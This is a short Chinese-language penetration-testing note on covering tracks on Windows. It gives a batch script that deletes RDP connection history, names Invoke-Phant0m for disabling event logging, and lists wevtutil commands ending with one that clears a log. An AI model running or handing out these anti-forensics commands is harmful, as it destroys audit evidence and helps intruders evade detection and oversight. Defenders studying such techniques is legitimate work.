渗透过程中对痕迹清理的几点记录

0x00 前言

在渗透测试过程中，Windows日志往往会记录系统上的敏感操作，如添加用户，远程登录执行等。

对于一次完整的渗透测试，通常会选择对Windows日志进行清除和绕过，而对于防御者来说，了解常用的绕过方法也有助于更好的保护自己的系统。

所以本文将要介绍常见的Windows日志清除与绕过方法，分享经验，帮助大家。

0x01 工具推荐

• 3389登陆记录清除

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

• 破坏Windows日志记录功能
  Invoke-Phant0m

Windwos-EventLog-Bypass

• Windows日志清除
  1.获取日志分类列表：

wevtutil el >1.txt

2.获取单个日志类别的统计信息： eg.

wevtutil gli "windows powershell"

3.回显：

creationTime: 2016-11-28T06:01:37.986Z

lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1

4.查看指定日志的具体内容：

wevtutil qe /f:text "windows powershell"

5.删除单个日志类别的所有信息：

wevtutil cl "windows powershell"

详细windows日志清除请查阅此篇文章：渗透技巧——Windows日志的删除与绕过

部分转载文章来自：3gstudent大佬 渗透技巧——Windows日志的删除与绕过